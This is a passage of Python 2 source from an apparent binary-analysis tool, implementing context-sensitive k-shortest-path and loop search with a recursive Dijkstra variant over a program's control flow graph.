    def __get_precall_stack( self, path, node=None ):
        pcallstack = []


        for u, v in to_edges(path):                 # for every edge on the path          
            if u == node: break                     # if you have reached the target node, stop

            # we can do this, because path is not malformed
            # get the jump kind of the edge in CFG
            if self.__G.has_edge(self.__f(u), self.__f(v)):
                jumpkind = self.__G.get_edge_data(self.__f(u), self.__f(v))['jumpkind']
            else:
                error("Edge (0x%x -> 0x%x) is missing from the CFG" % (u, v))

            # push on calls, pop on returns (as a regular stack works)
            if   jumpkind == 'Ijk_Call': pcallstack.append(u)
            elif jumpkind == 'Ijk_Ret':  pcallstack.pop()


        return pcallstack                           # return the precall stack


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. 
    #
    # :Arg graph: Graph to work on
    # :Arg shortest_path_cb: A callback function for calculating shortest paths
    # :Arg f: A lambda function to transform nodes before used as "indices" in the graph
    #
    def __init__( self, graph, shortest_path_cb, f ):
        self.__G             = graph                # simply store arguments locally
        self.__shortest_path = shortest_path_cb
        self.__f             = f

    
    # ---------------------------------------------------------------------------------------------
    # k_shortest_paths(): As the name suggests, this function finds the k shortest loopless paths.
    #       The only issue here is that Yen's algorithm can return duplicate paths. We can fix this
    #       issue by implementing "Lawler's modification". The algorithm also uses an optimization:
    #       Instead of removing edges and nodes from the graph and adding them later, we simply
    #       "mark" them and we instruct each shortest path algorithm to explicitly avoid them
    #       during search. 
    #
    # :Arg source: The source node
    # :Arg destination: The destination node
    # :Arg cur_uid: UID of the SPL statement that is about to execute
    # :Arg K: The number of paths to search for
    # :Ret: This function is actually a generator. Every time that's invoked it returns a tuple 
    #       (cost, path) that contains the cost of the next shortest path along with that path.
    #       If such a path does not exists, function returns (-1, []).
    #
    def k_shortest_paths( self, source, destination, cur_uid, K ):
        assert( K > 0 )                             # we should search for at least 1 path

        source      = int(source)                   # source and destination may be 'long'
        destination = int(destination)


        # find the first shortest path (along with its auxiliary information)
        path, pathlens, expaths = self.__shortest_path( source, destination, cur_uid )        
        length = pathlens[-1]


        if length < 0 or length == INFINITY:        # if path doesn't exist, stop
            return

        yield length, expaths[-1]                   # start with the shortest expanded path


        # NOTE: We start to work with path and not with expaths[-1]. If path has cycles,
        # then we may return the same path >1 times. Not a big deal though.       

        A = [path]                                  # the k shortest paths
        B = []                                      # heap for next potential shortest path
        L = [ pathlens[:] ]                         # additional tables for previous path lengths
        E = [ expaths[:]  ]                         # and previous expanded paths

        prev_expaths = [ expaths[-1][:] ]           # remember all previous expanded paths
    

        # -------------------------------------------------------------------------------
        # Each iteration finds the next shortest path
        # -------------------------------------------------------------------------------   
        for k in range(1, K):                       # for each shortest path deviation

            # spur node ranges from first to one before the last node in the previous (k-1) path
            for i in range(0, len(A[k-1]) - 1):
                spur = A[k - 1][i]                  # pick a spur node

                # root path: Path from the source to the spur node of the (k-1) path
                rootpath    = A[k-1][:i+1]
                rootpathlen = L[k-1][i]

                
                # Now it's time for our optimization: Instead of removing edges and nodes, we
                # set to them the "avoid" attribute and we explicitly instruct shortest path
                # algorithm to avoid them during search. The "avoid" operation has to be 
                # context sensitive

                for p in A:                         # for each previous path
                    if len(p) > i and rootpath == p[:i+1]:
                        # "remove" edge
                        self.__G[ self.__f(p[i]) ][ self.__f(p[i+1]) ][ 'avoid' ] = \
                                    self.__get_precall_stack(p, p[i])
  
                    # print '\tDROP EDGE', self.__f(p[i]), self.__f(p[i+1]), self.__get_precall_stack(p, p[i])


                for node in rootpath[:-1]:          # for each node in rootpath (except spur node)
                    # "remove" node
                    self.__G.node[ self.__f(node) ][ 'avoid' ] = \
                                self.__get_precall_stack(rootpath, node)

                    # print '\tDROP NODE', self.__f(node), self.__get_precall_stack(rootpath, node)


                # calculate spur path from the spur node to the destination
                # (the rootpath is needed for the case of CFG)

                # this destroys 'depth' and 'path', so we have to precalculate them
                spurpath, spurpathlens, spurexpaths = \
                            self.__shortest_path(spur, destination, cur_uid, self.__get_precall_stack(A[k-1], spur))


                # print "TRY SP", hex(spur), hex(destination), pretty_list(spurpath)
                        
                length = spurpathlens[-1]


                # if path exists                
                if length > 0 and length < INFINITY:
                    path = rootpath[:-1] + spurpath

                    # append lengths of the root path to the spur path
                    pathlens = L[k-1][:i] + map(lambda l: l + rootpathlen, spurpathlens)

                    # do the same with expanded (sub)paths
                    expaths = E[k-1][:i][:]

                               # prepend for the root subpath on every spur subpath (use [:] to make copies)
                    for expath in spurexpaths:
                        if i > 0:
                            expaths.append( E[k-1][i-1][:] + expath[:] )
                        else:
                            expaths.append( expath[:] )


                    # Add potential shortest path to the heap


                    # Paths that invoke the same function multiple times, cause the algorithm
                    # to return the same path multiple times (because the spur path can visit
                    # (expand) this function, thus resulting a new path that is actually the same).
                    #
                    # To fix that, we look at the expanded paths (where all functions are expanded)
                    # so we can quickly discard duplicates.
                    is_unique = True

                    for expath in prev_expaths:     # for each previous expanded path
                        if not cmp(expath, expaths[-1]):
                            is_unique = False       # path is not unique. Discard it
                            break


                    # if path is unique add it to the list and to the heap
                    if is_unique: 
                        prev_expaths.append(expaths[-1])                 
                        heapq.heappush(B, (length+rootpathlen, path, pathlens, expaths) )


                # print '\t\tCLEAR ALL DROPS'

                # add back the edges and nodes that have been "deleted" from the graph.                     
                # (simply delete "avoid" attributes from them)
                for node, _ in nx.get_node_attributes(self.__G, 'avoid').items(): 
                    del self.__G.node[ node ]['avoid']                  
            
                for edge, _ in nx.get_edge_attributes(self.__G, 'avoid').items():                   
                    del self.__G[ edge[0] ][ edge[1] ]['avoid']


            if not B:
                # if heap is empty then there are no spur paths. This is the case when all spur
                # paths have already added to A, or when there is no path between source and
                # destination.
                break
                
            # A[k] = shortest path from heap
            cost, path, pathlens, expaths = heapq.heappop(B)
            
            A.append(path)                          # add path to A
            L.append(pathlens)                      # add path lengths to L
            E.append(expaths)                       # add expanded paths to E
       
            yield cost, expaths[-1]                 # return next path (expanded version)


    # ---------------------------------------------------------------------------------------------
    # k_shortest_loops(): As the name suggests, this function finds the k shortest loops (cycles)
    #       starting from a given source. To do that, we find the k shortest paths from the source
    #       to each source predecessor and we add one more edge to form the cycle. Then, we simply
    #       select the k shortest cycles (as we can have up to k paths for each predecessor).
    #
    # :Arg source: The source node
    # :Arg cur_uid: UID of the SPL statement that is about to execute
    # :Arg K: The number of loops to search for
    # :Ret: This function is actually a generator. Every time that's invoked it returns a tuple 
    #       (cost, cycle) that contains the cost of the next cycle  with that cycle. If such a
    #       loop does not exists, function returns (-1, []).
    #
    def k_shortest_loops( self, source, cur_uid, K ):        
        heap = []                                   # heap to store all nodes

        # for each predecessor & for each of the (up to) K shortest paths
        for destination in ADDR2NODE[source].predecessors:
            for length, path in self.k_shortest_paths(source,  destination.addr, cur_uid, K):
                if length != INFINITY:

                    # The last edge that we add, might be in a different context (this happens
                    # when the predecessor edge is a return). If our context is right, the
                    # precall stack will have 0 or 1 elements. In the 2nd case, that element
                    # and the source must be a valid edge in the CFG with the "fakeret" attribute.
                    callstack = self.__get_precall_stack(path)

                    if len(callstack) == 1 and \
                        not self.__G.has_edge(self.__f(callstack[0]), self.__f(source)):
                            continue                # loop out of context


                    # add the predecessor edge to complete the cycle
                    heapq.heappush(heap, (length + 1, path + [source]))


        # yield the (up to) K minimum cycles
        while len(heap) > 0 and K > 0:
            yield heapq.heappop(heap)               # return length, path              
            K -= 1                                  # decrement K

                  
# -------------------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------------------
# _cfg_shortest_path: This module calculates shortest paths within a CFG. Searching for shortest
#   paths in a CFG is not as simple as searching for shortest paths in a regular graph, as paths
#   are context sensitive. Let's see a counterexample:
#
#                        +              +----------> foo
#                        |              |             +
#                    call foo           |             |
#                        | <----------------+         |
#                       {B}             |   |         |
#                        |              |   |         |
#                        |              |   |         |
#                       {A}             |   |         |
#                        |              |   |         |
#                    call foo +---------+   |         |
#                        |                  |         v
#                        v                  +------+ retn
#
#   Let's assume that our code doesn't have any loops. This means that it's impossible to move from
#   {A} to {B} under program execution and hence, such a path should not exist. However, if we
#   apply a classic shortest path algorithm (e.g., Dijkstra), we will find a path, that goes from
#   {A} to foo(), then to the return point of foo() and then to the instruction right after the 1st
#   call thus ending up at {B}. The main cause of this issue is that in CFG, a block with a retn,
#   has an edge to every possible return point and the shortest path algorithm does not take into
#   consideration the current "context".
#
#   A naive solution here, is to keep track of the current path, using backpointers. Every time we
#   encounter a return instruction, we move backwards to the point that this function was invoked
#   and we pick the appropriate edge, that take us to the instruction right after call.
#   
#   The problem with this solution, is that it can easily fall into a _deadlock_. For instance,
#   consider the case where we have two paths in the priority queue. The 1st path has visited few
#   blocks of some function foo(), and therefore they are marked as visited. Now, the 2nd path
#   reaches a block that calls foo(). If foo() has already been analyzed, we can simply follow the
#   "fakeret" edge and use foo()'s length (or "depth") as edge weight. Unfortunately,we don't know
#   that (as it's under inspection by the 1st path) and we can't visit it twice, thus creating a
#   deadlock
#
#
#   The problem gets even harder when CFG contains recursive functions or sets of functions that
#   form a cycle in the Call Graph). Our approach is to use a variant of Dijkstra's algorithm. If
#   a function doesn't have any callees, a classic Dijsktra suffices to find out the shortest 
#   paths. Otherwise, we recursively do a Dijkstra for each calling function. Thus, we can get each
#   function's depth before we continue searching. Finally, we also need a Call Stack to avoid
#   infinity loops when we analyze recursive functions.
#
class _cfg_shortest_path( _cs_ksp_intrl ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __valid_neighbors(): Given a node, find all "valid" neighbors (remember not all edges in CFG
    #       are valid).
    #
    # :Arg node: Node to find it's neighbors.
    # :Ret: A list of all neighbor nodes.
    # 
    def __valid_neighbors( self, node ):
        # get all node's neighbors as tuples (node, jumpkind)
        neighbors = [ (n, self.__G.get_edge_data(node, n)['jumpkind']) 
                        for n in self.__G.neighbors(node) ]

        jumps = [ j for (n,j) in neighbors ]        # isolate jump kinds

        # Uncomment the following line to return all targets and behave like a normal BFS:
        #       return [n for n,_ in neighbors]


        # -------------------------------------------------------------------------------
        # Special Case #1: syscall
        # 
        # When node ends with a syscall, it has 2 edges: One to the node after syscall 
        # (marked as Ijk_FakeRet) and one to an internal node for syscall (marked as 
        # Ijk_Sys_syscall). We only care about the 1st case.
        # -------------------------------------------------------------------------------
        if   ['Ijk_FakeRet', 'Ijk_Sys_syscall'] == jumps: return [neighbors[0][0]]      
        elif ['Ijk_Sys_syscall', 'Ijk_FakeRet'] == jumps: return [neighbors[1][0]]


        # -------------------------------------------------------------------------------
        # Special Case #2: call
        #
        # When node ends with a call, it has 2 edges: One to the function's entry point
        # (marked as Ijk_Call) and one the node after call (marked as Ijk_FakeRet). If
        # it's the 1st time we visit this function, we use the 1st edge in order to 
        # analyse function. Othewise, we use the 2nd edge and we set the weight to be
        # equal with function's minimum depth (from entry point to the shortest exit).
        # -------------------------------------------------------------------------------
        elif ['Ijk_FakeRet', 'Ijk_Call'] == jumps:
            # return caller function as well (but mark it first)
            # caller should be returned first
            return [(neighbors[1][0], 'caller', neighbors[0][0])]
            
            '''
            if neighbors[1][0].addr in self.__depth:                
                self.__G[ node ][ neighbors[0][0] ]['depth'] = self.__depth[neighbors[1][0].addr]
                return [neighbors[0][0]]
            else: 
                return [neighbors[1][0]]
            '''

        elif ['Ijk_Call', 'Ijk_FakeRet'] == jumps:          
            # return caller function as well (but mark it first)
            return [(neighbors[0][0], 'caller', neighbors[1][0])]

            '''
            if neighbors[0][0].addr in self.__depth:        
                self.__G[ node ][ neighbors[1][0] ]['depth'] = self.__depth[neighbors[0][0].addr]
                return [neighbors[1][0]]
            else:           
                return [neighbors[0][0]]
            '''

        elif ['Ijk_Call'] == jumps:
            # in that case, return block is missing, so we skip it
            return [(neighbors[0][0], 'caller', -1)]


        # -------------------------------------------------------------------------------
        # Special Case #3: retn
        #
        # In case of a return, we're using back pointers to move backwards in current
        # path, until we find a node with a Ijk_FakeRet edge that points to a node in
        # the return list (the Ijk_Ret edges).
        #
        #
        # UPDATE: In the "Recursive Dijkstra" approach, a return block indicates the
        # end of the search and therefore, we don't have to look for the block after
        # the caller.
        # -------------------------------------------------------------------------------
        elif 'Ijk_Ret' in jumps:
            return []                   # the party stops here....

            '''
            # get edge's jump kind or None if edge doesn't exit
            edge = lambda u, v: self.__G.get_edge_data(u, v)['jumpkind'] \
                             if self.__G.get_edge_data(u, v) else None

            # get all nodes with Ijk_Ret edges
            ret = [(n,j) for (n,j) in neighbors if j == 'Ijk_Ret']

            curr  = node
            depth = 0 

            while curr > 0:                         # while we haven't reach root
                # get edges from curr to all return targets
                caller = [n for n,_ in ret if edge(curr, n) == 'Ijk_FakeRet']

                if caller:                          # caller found!
                    self.__G[ curr ][ caller[0] ][ 'depth' ] = depth
                    self.__depth[ prev.addr ] = depth

                    return caller                   # caller is unique                  

                prev = curr                         # ow, move one step back
                curr = self.__backpointer.get(curr.addr, _NULL_NODE)

                if curr == _NULL_NODE: return []

                # increase function's depth (if there are nested functions, accumulate depth)
                depth += 1 + self.__G[ curr ][ prev ].get('depth', 0)


            # this point should never be reached
            '''
        

        # -------------------------------------------------------------------------------
        # Case #4: Other jumps (Ijk_boring)
        #
        # For the rest of the jumps, we keep all edges.
        # -------------------------------------------------------------------------------   
        else: return [n for n,_ in neighbors]


    # ---------------------------------------------------------------------------------------------
    ''' # Old Shortest Path algorithm (keep it for reference) #

    # ---------------------------------------------------------------------------------------------
    # __bfs_variant(): Calculate the shortest paths from root to all final nodes, using a variant
    #       of classic Breadth First Search (BFS) algorithm. This algorithm has an extra feature:
    #       it _avoids_ all the nodes and edges that have the "avoid" attribute. In some cases we
    #       we need to find a path that doesn't contain some specific edges/nodes. Thus, instead
    #       of deleting and adding them later, we simply mark them as "avoid" and we instruct the
    #       algorithm to ignore them during searcing.
    # 
    # :Arg root: node to start from searching
    # :Arg finals: a list of all target nodes
    # :Ret: A list of tuples with the length and the path for each final node.
    #   
    def __bfs_variant( self, root, finals=[] ):     
        nleft  = len(finals)                        # number of final nodes
        finals_d = dict((n,0) for n in finals)      # cast to dict to search in O(1)

        visited              = { }                  # visited nodes
        visited[ root.addr ] = 0                    # distance from root is 0

        self.__backpointer            = { }         # backpointers      
        self.__backpointer[root.addr] = _NULL_NODE  # root has no parent

        self.__depth = { }                          # function's min depth


        # clear leftovers in CFG from previous calls
        for n, _ in nx.get_edge_attributes(self.__G,'depth').items():
            del self.__G.edge[ n[0] ][ n[1] ]['depth']


        # -------------------------------------------------------------------------------
        # start searching
        # -------------------------------------------------------------------------------
        if 'avoid' in self.__G.node[ root ]:        # if root must be avoided
            return -1, []                           # abort


        Q = queue.Queue()
        Q.put( root )                               # push root node to the queue

        while not Q.empty():                        # while there are unvisited nodes
            v = Q.get()                             # get front node

            if v in finals_d:                       # is current node in finals?            
                nleft -= 1      
                if nleft <= 0: break                # all final nodes have been found

            for n in self.__valid_neighbors( v ):   # for each neighbor node


                # TODO: exculde clobbering nodes
                
                # ignore nodes and edges that marked as "avoid"
                if 'avoid' in self.__G.node[ n ] or 'avoid' in self.__G[ v ][ n ]:
                    continue


                if n.addr not in visited:           # if not visited, push it to the queue

                    self.__backpointer[n.addr] = v  # set backpointer to the parent node
                    Q.put( n )                      # push node on queue

                    # set node's shortest path accordingly                  
                    visited[n.addr] = visited[v.addr] + 1 + self.__G[ v ][ n ].get('depth', 0)


        # -------------------------------------------------------------------------------
        # Search has finished. Extract paths
        # -------------------------------------------------------------------------------
        sp = []                                     # list of shortest paths

        for n in finals:                            # for each final node           
            path = []
            p = n
            
            while p > 0:                            # go all the way up to the root         
                path.insert(0, int(p.addr) )        # add node to the path (in reverse order)
                p = self.__backpointer.get(p.addr, -1)
                
                
            # if final node is not visited, set distance to -1
            sp.append( (visited.get(n.addr, -1), path) )
            
        return sp # return list of tuples


    # ---------------------------------------------------------------------------------------------
    '''


    # ---------------------------------------------------------------------------------------------
    # __depth_metric(): Determine the metric for measuring function's depth. This function tries
    #       to estimate the minimum number of distinct basic blocks that should be executed within 
    #       a function. To do that, one should look at the shortest paths from the entry point to
    #       all final basic blocks (those that end with a return instruction) and select as depth
    #       the length of the minimum of these (shortest) paths.
    #
    #       However this metric might not always work well, as it's very common to make argument 
    #       checks at the very early stages of a function and abort if they do not meet the 
    #       requirements.
    #   
    #       To fix that, this function offers 3 metrics: The minimum among the shortest paths, the
    #       maximum and the median of all shortest paths. We leave the final decision up to the 
    #       user.
    #
    # :Arg retns: A list of tuples (dist, path) that contains all shortest paths to a final block
    #             along with their distances
    # :Ret: Function's depth along with a path (if applicable).
    #
    def __depth_metric( self, retns ):
        if not len(retns): return 0, []

        # getting the median is tricky, so we have to sort all return paths first
        sorted_retns = sorted(retns[:], key=lambda x: x[0])

        if FUNCTION_DEPTH_METRIC == 'min':                   
            return sorted_retns[0]
        
        elif FUNCTION_DEPTH_METRIC == 'max':            
            return sorted_retns[-1]
        
        elif FUNCTION_DEPTH_METRIC == 'median':
            return sorted_retns[len(sorted_retns) >> 1]

        else:
            fatal("Invalid value for 'FUNCTION_DEPTH_METRIC'!")


    # ---------------------------------------------------------------------------------------------
    # __clob_stmts(): This function finds all SPL statements whose accepted blocks are clobbering
    #       with a given statement. This is essentially a Depth First Search (DFS) on the Reverse
    #       Adjacency list (self.__radj) starting from current statement. This is due to the time
    #       sensitivity of the clobbering blocks; thtat is a clobbering block becomes truly 
    #       clobbering *after* the execution of some SPL statement.
    #   
    # :Arg cur_uid: of Current statement's UID
    # :Ret: Function returns a set of all statement UIDs whose blocks are _effectively_ clobbering.
    #
    def __clob_stmts( self, cur_uid ):
        if not self.__clobbering:           # if clobbering blocks are ignored
            return set()                    # skip it

        if cur_uid != START_PC and cur_uid not in self.__radj:
            fatal("Statement with uid '%d' is not in the reverse adjacency list" % cur_uid)

        clobs = set()                       # clobbering (visited) statements
        stack = [cur_uid]                   # start from root

        while stack:
            curr = stack.pop()              # get top element of the stack

            if curr not in clobs:
                clobs.add(curr)             # mark it
                
                if curr in self.__radj:     # add reverse neighbors, if any (up to 2)
                    stack.extend( self.__radj[curr] )

        return clobs                        # return clobbering statement set


    # ---------------------------------------------------------------------------------------------
    # __dijkstra_variant_rcsv(): This is the recursive variant of Dijkstra's algorithm that we
    #       described above.
    #
    # :Arg root: node to start searching from
    # :Arg finals: a list of all target (final) nodes
    # :Arg precall_stack: Current precall stack
    # :Arg init_dist: Initial distance to start from (i.e., distance from initial root)
    # :Ret: Function return  two lists of tuples. The first list contains the length and the path
    #       path for each final node. The second list contains the length and the path for each
    #       return node.
    #
    def __dijkstra_variant_rcsv( self, root, finals=[], precall_stack=[], init_dist=0 ):
        nleft    = len(finals)                      # number of final nodes
        finals_d = dict((n,0) for n in finals)      # cast to dict to search in O(1)

        Q        = queue.PriorityQueue()            # implement it using a prioirty queue
        retn_s   = [ ]                              # return node set


        dbg_prnt(DBG_LVL_4, 'Starting recursive Dijkstra at: 0x%x (%s). Pre-call Stack: %s' % 
                 (root.addr, func_name (root.addr), pretty_list(precall_stack, ', ')))


        # if root is clobbering skip it (function is recursive, root may not be the top node)
        if 'clobbering' in self.__G.node[ root ]:
                return [(INFINITY, [])]*len(finals), [(INFINITY, [])]*len(finals)

        # if root node must be avoided (in the current context), or if it's already in the
        # Call Stack, return non-existing path(s).
        if 'avoid' in self.__G.node[root] and precall_stack == self.__G.node[root]['avoid'] or \
            root in self.__callstack:
                return [(INFINITY, [])]*len(finals), [(INFINITY, [])]*len(finals)


        self.__callstack[root] = 1
        self.__dist[root]      = init_dist          # distance from root 


        # when function has multiplee callers, just keep the 1st one for the shortest path
        if root not in self.__backpointer:
            self.__backpointer[root] = -1           # root has no parent


        # -------------------------------------------------------------------------------
        # Main Dijkstra loop
        # -------------------------------------------------------------------------------
        Q.put(_queue_obj(root, self.__dist[root]))  # add root to the queue

        while not Q.empty():                        # while there are vertices in the queue
            u = Q.get().data                        # get front node's data

        
            # print node with minimum cost
            if self.__backpointer[u] == -1: n, a = '-1', 0xffffffff
            else: n, a = self.__backpointer[u].name, self.__backpointer[u].addr

            dbg_prnt(DBG_LVL_4, "\tSelect min: %3d 0x%x (%s)\t<-- 0x%x (%s)" % 
                                    (self.__dist[u], u.addr, u.name, a, n))


            # In practise, paths lengths are not longer than MAX_ALLOWED_SUBPATH_LEN, as
            # it's highly unlikely to have satisfiable constraints. Therefore we stop once
            # a path reaches its upper bound, to boost our algorithm.
            if self.__dist[u] > MAX_ALLOWED_SUBPATH_LEN:
                continue                            # discard current path


            if u in finals_d:                       # is current node in finals?                       
                nleft -= 1
                if nleft <= 0: break                # all final nodes have been found

            if u.has_return: retn_s.append(u)       # returns nodes are needed too


            # check all (valid) neighbors for the current node
            for v in self.__valid_neighbors( u ):

                # -----------------------------------------------------------------------
                # Is current block a caller?
                # -----------------------------------------------------------------------
                if isinstance(v, tuple) and v[1] == 'caller':

                    # ignore clobbering nodes
                    if 'clobbering' in self.__G.node[ v[0] ]:
                            continue

                    # ignore nodes and edges that marked as "avoid"                
                    if 'avoid' in self.__G.node[v[0]] and precall_stack == self.__G.node[v[0]]['avoid'] or \
                       'avoid' in self.__G[u][v[0]]   and precall_stack == self.__G[u][v[0]]['avoid']:
                            continue

                  
                    # if function is not yet analyzed
                    if v[0] not in self.__funcdepth:            
                        # It is possible that the function is not in __funcdepth but it is still
                        # visited. This happens when 1) function is recursive or 2) function was
                        # invoked through a jmp before the call. For instance:
                        #   
                        #        .text:0000000000410FC0 cipher_decrypt  proc near
                        #        .....
                        #        .text:0000000000411021        mov     context, [rsp+1A8h+var_10]
                        #        .text:0000000000411029        mov     src, [rsp+1A8h+var_8]
                        #        .text:0000000000411031        add     rsp, 1A8h
                        #        .text:0000000000411038        jmp     _memcpy        
                        #
                        #        .plt:0000000000403A70 _memcpy         proc near
                        #        .plt:0000000000403A70        jmp     cs:off_621528
                        #
                        #
                        # In both cases, we don't touch the function if its root is already visited
                        if self.__dist[v[0]] <= self.__dist[u] + 1:
                            continue


                        # set distance to the root node
                        self.__dist[v[0]]        = self.__dist[u] + 1
                        self.__backpointer[v[0]] = u


                        # Recursively call Dijkstra for the new function
                        F, R = self.__dijkstra_variant_rcsv(v[0], finals, precall_stack + [u.addr], 
                                                            self.__dist[u] + 1)

                        # estimate function's depth
                        #
                        # Note that if function has no returns, then cost will be 0 and P may not
                        # be applicable
                        cost, P = self.__depth_metric(R)
                        self.__funcdepth[ v[0] ] = (cost, P)


                        # All return paths have now their backpointers set. 
                        # We select P as return path (according to __depth_metric)
                        R = [(cost, P)]

                        
                        dbg_arb(DBG_LVL_4,  '\tF set:', [(f[0], pretty_list(f[1])) for f in F])
                        dbg_arb(DBG_LVL_4,  '\tR set:', [(r[0], pretty_list(r[1])) for r in R])
                        dbg_prnt(DBG_LVL_4, '\tP set: %s' % pretty_list(P))
                        dbg_prnt(DBG_LVL_4, "\tFunction '%s' has depth %d" % (v[0].name, cost))

                    else:
                        R = []                      # in that case, R is empty
                        
                        # is function is already analyzed, just use its paths
                        # (+1 to jump the function and +1 to return from it)

                        if v[2] != -1:              # check if there's an edge
                            self.__G[ u ][ v[2] ]['depth'] = self.__funcdepth[ v[0] ][0] +1 +1
                            self.__G[ u ][ v[2] ]['path']  = self.__funcdepth[ v[0] ][1]


                    # -------------------------------------------------------------------
                    # at this point, __funcdepth is set (unless dist[v[0]] <= dist[u]+1)
                    # -------------------------------------------------------------------
                    try:
                        altd = self.__dist[u] + 1 + self.__funcdepth[ v[0] ][0] + 1
                    except KeyError:
                        altd = INFINITY             # function root is visited but depth is unknown


                    # if there's no return, skip this edge
                    if v[2] == -1:
                        warn("Caller 0x%x (%s) has no return" % (v[0].addr, v[0].name), DBG_LVL_4)
                        continue

                    # v[2] may also be clobbering
                    if 'clobbering' in self.__G.node[ v[2] ]:
                            continue

                    if altd < self.__dist[v[2]]:    # if alternative path is shorter, ute it
                        self.__dist[v[2]]        = altd
                        self.__backpointer[v[2]] = u
                        
                        Q.put(_queue_obj(v[2], altd))


                        # Now go back and fix backpointers
                        #
                        # it might be possible to not have this edge in the CFG. For example:
                        # 
                        #       .text:000000000040E00D         mov     rdi, ch_0
                        #       .text:000000000040E010         call    chan_write_failed
                        #       .text:000000000040E015         mov     ecx, [ch_0+10h]
                        #
                        #       .text:00000000004124E0 chan_write_failed proc near
                        #       .text:0000000000412552         jmp     chan_delete_if_full_closed
                        #
                        #       .text:00000000004122E0 chan_delete_if_full_closed proc near
                        #       .text:000000000041230C         jmp     channel_free
                        #   
                        #       .text:000000000040DA30 channel_free proc near
                        #       .text:000000000040DAD2         pop     rbx
                        #       .text:000000000040DAD3         retn
                        #        
                        # Here, returning from channel_free(), should bring us to 0x40e015, however
                        # this edge may not be exists. Therefore we need to add an 'Ijk_Ret' edge.
                        if R:
                            for _, retn in R:
                                for a, b in to_edges(retn, direction='backward'):                               
                                    self.__backpointer[ADDR2NODE[a]] = ADDR2NODE[b]
                                
                                if len(retn) > 1:   # fix the last backpointer
                                    self.__backpointer[v[2]] = ADDR2NODE[a]

                                    # add the edge (if not exists)
                                    if not self.__G.has_edge(ADDR2NODE[a], v[2]):
                                        self.__G.add_edge(ADDR2NODE[a], v[2], jumpkind='Ijk_Ret')


                            # This is not needed as we start distances from init_dist
                            #   for r in retn[1:]:
                            #       self.__dist[ ADDR2NODE[r] ] += self.__dist[u] + 1;


                # -----------------------------------------------------------------------
                # Block is not a caller
                # -----------------------------------------------------------------------
                else:       
                    # if node is clobbering skip it
                    if 'clobbering' in self.__G.node[v]:
                            continue

                    # ignore nodes and edges that marked as "avoid"
                    if 'avoid' in self.__G.node[v] and precall_stack == self.__G.node[v]['avoid'] or \
                       'avoid' in self.__G[u][v]   and precall_stack == self.__G[u][v]['avoid']:
                            continue

                    # Although we handle this case pretty well, we still highlight it
                    if u.addr in ADDR2FUNC and v.addr in ADDR2FUNC and ADDR2FUNC[u.addr] != ADDR2FUNC[v.addr]:
                        warn("Node 0x%x (%s) transfers control to '%s'" %
                                (u.addr, u.name, ADDR2FUNC[v.addr].name), DBG_LVL_4)
                        
            
                    # check if the alternative path is better
                    altd = self.__dist[u] + 1
                    if altd < self.__dist[v]:       # if alternative path is shorter, use it
                        self.__dist[v]        = altd
                        self.__backpointer[v] = u
                        
                        Q.put(_queue_obj(v, altd))  # and add it to the queue


        # pop current function from Call Stack before return
        del self.__callstack[root]


        # -------------------------------------------------------------------------------
        # Search has finished. Extract paths
        # -------------------------------------------------------------------------------       
        dbg_prnt(DBG_LVL_4, 'Leaving recursive Dijkstra at 0x%x (%s). Return Set: %s' % 
                                (root.addr, root.name, pretty_list(retn_s, ', ')))


        # -------------------------------------------------------------------------------
        # extr_paths(): This internal function extracts all paths from the return blocks
        #       to the root, using the backpointers.
        #
        # :Arg final_blks: A set of all basic blocks that have a return instruction
        # :Ret: Function
        #
        def extr_paths( final_blks ):
            paths = []                              # list of shortest paths            

            for n in final_blks:                    # for each final node
                path  = []
                p     = n
                found = False

                dbg_prnt(DBG_LVL_4, "\tExtracting (reverse) path from 0x%x to 0x%x" %  
                                            (n.addr, root.addr))
        
                while p > 0:                        # go all the way up to the root                        
                    dbg_prnt(DBG_LVL_4, "\t\t%3d 0x%x (%s)" % (self.__dist.get(p, -1), p.addr, p.name))                 


                    path.insert(0, int(p.addr) )    # add node to the path (in reverse order)

                    if p == root:                   # if you reach root, stop
                        found = True
                        break
               
                    if p in path:                   # cycles will make loop infinite
                        fatal('Backpointers contain a loop. Abort')

                    p = self.__backpointer.get(p, -1)

                  
                # if final node is not visited or root is not found, set distance to -1                
                if not found:
                    distance = INFINITY
                else:               
                    distance = self.__dist.get(n, INFINITY)
                    if distance != -1 and distance != INFINITY:
                         distance -= init_dist

                dbg_prnt(DBG_LVL_4, "\t\tFinal Distance: %d (Initial Distance: %d)" % 
                                        (distance, init_dist))

                # append path to the shortest path list             
                paths.append( (distance, path if distance < INFINITY else []) )                    


            return paths


        # -------------------------------------------------------------------------------

        return extr_paths(finals), extr_paths(retn_s)
    

    # ---------------------------------------------------------------------------------------------
    # __dijkstra_variant(): This function essentially bootstraps the recursive Dijsktra algorithm.
    #
    # :Arg root: node to start from searching
    # :Arg finals: a list of all target nodes
    # :Arg cur_uid: Current statement's UID
    # :Arg precall_stack: Current precall stack
    # :Ret: A list of tuples with the length and the path for each final node.
    #
    def __dijkstra_variant( self, root, finals=[], cur_uid=-1, precall_stack=[] ):
        self.__dist        = { }                    # visited nodes
        self.__backpointer = { }                    # backpointers      
        self.__callstack   = { }                    # call "stack" to prevent infinite recursions
        self.__funcdepth   = { }                    # function depths 


        clobs = self.__clob_stmts(cur_uid)          # set of clobbering block UIDs to avoid


        # UPDATE: Yes they are. Think about calls with clobbering arguments ;)
        #
        #   # the first and last nodes are never clobbering
        #   nonclob = [root.addr] + [final.addr for final in finals]

        # exclude clobbering blocks from search (mark them so they can be avoided)
        for addr, uidlist in self.__clobbering.iteritems():            
            # if addr not in nonclob and not disjoint(set(uidlist), clobs):
            if not disjoint(set(uidlist), clobs):
                self.__G.node[ ADDR2NODE[addr] ]['clobbering'] = 1
               
        
        # initialize all node distances to INF
        for vtx, _ in self.__G.nodes_iter(data=True):
            self.__dist[vtx]        = INFINITY
            self.__backpointer[vtx] = -1


        try:
            # get shortest paths to all final nodes (ignore the return nodes)
            paths, _ = self.__dijkstra_variant_rcsv(root, finals, precall_stack=precall_stack)
        except Exception, e:                        # just in case that something goes wrong                       
            traceback.print_exc()                   # print exception trace
            fatal('Unexpected exception in __dijkstra_variant_rcsv(): %s' % str(e))


        # print function depths (DBG_LVL_4 only)        
